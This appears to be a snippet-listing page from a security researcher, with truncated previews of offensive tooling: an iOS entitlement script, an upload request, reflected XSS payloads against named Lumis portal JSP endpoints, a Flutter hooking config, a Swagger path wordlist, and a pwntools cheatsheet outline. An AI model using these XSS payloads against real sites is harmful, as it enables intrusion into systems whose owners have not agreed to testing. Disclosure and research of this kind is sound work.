rodnt

#!/bin/bash
# Author: 0xz41 feat Shoaloak
# Description: Fix iOS binary entitlements/access for "Operation not permitted"

ENTITLEMENT="com.apple.private.security.container-manager"
binaries=(
    "sh" "bash" "zsh" "dash"       
    "ls" "cat" "find" "cp" "mv"  
    "rm" "mkdir" "rmdir" "touch"
    "file" "ln" "du" "scp"

rodnt

POST /se/v54285/form/efms_exec_html/file_upload_parser.php HTTP/2
Host: localhost
Cookie: se-authentication-token=7dd277d81ca7b14db919a1c1e46c18dc36f7; mode=deploy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------239428381620151611771983433321
Content-Length: 471

rodnt

Payload: /main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=

• Request

• Response

rodnt

Payload: GET /main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa

• Request

• Response

Author: Rodolfo Tavares

rodnt

Payload: GET /lumis/service/htmlevaluation/UrlAccessibilityEvaluation.jsp?contentHtml=%3cp%3e%3ci%20id%3d%22run-code-button%22%20lang%3d%22xml%22%20title%3d%22Run%20Code%20and%20See%20Output%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3cp%3e%3ci%20title%3d%22Light%20Mode%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3ctable%20border%3d%220%22%20cellpadding%3d%220%22%20cellspacing%3d%220mmdfn%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt

-Request

• Response

Author: Rodolfo Tavares

rodnt

GET request: GET /portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=

• Request Proof.txt

• Execute Payload

rodnt

/**
 * by rodnt
 * twitter: 0xrodnt
 * Github: rodnt
*/

const config = {
    flutterPatterns: {
        android: "F? 0F 1C F8 F? 5? 01 A9 F? 5? 02 A9 F? ?? 03 A9 ?? ?? ?? ?? 68 1A 40 F9"
    },

rodnt

/swagger-ui.html
/swagger-ui/
/swagger-ui/index.html
/api-docs
/v2/api-docs
/v3/api-docs
/swagger.json
/openapi.json
/api/swagger.json
/docs

rodnt

#!/bin/bash

# Function to select the USB device
select_usb_device() {
  echo "Available USB devices:"
  local devices=(/dev/sd*)
  select usb_device in "${devices[@]}"; do
    if [ -z "$usb_device" ]; then
      echo "Invalid selection, please try again."
    else

rodnt

Pwntools Cheatsheet

1. Program Interaction
2. Environment and Contexts
3. Logging and Output
4. Encoding, Packing and Utility
5. Assembly and Shellcraft
6. ELFs, Strings and Symbols
7. Return Oriented Programming
8. SROP and Sigreturn Frames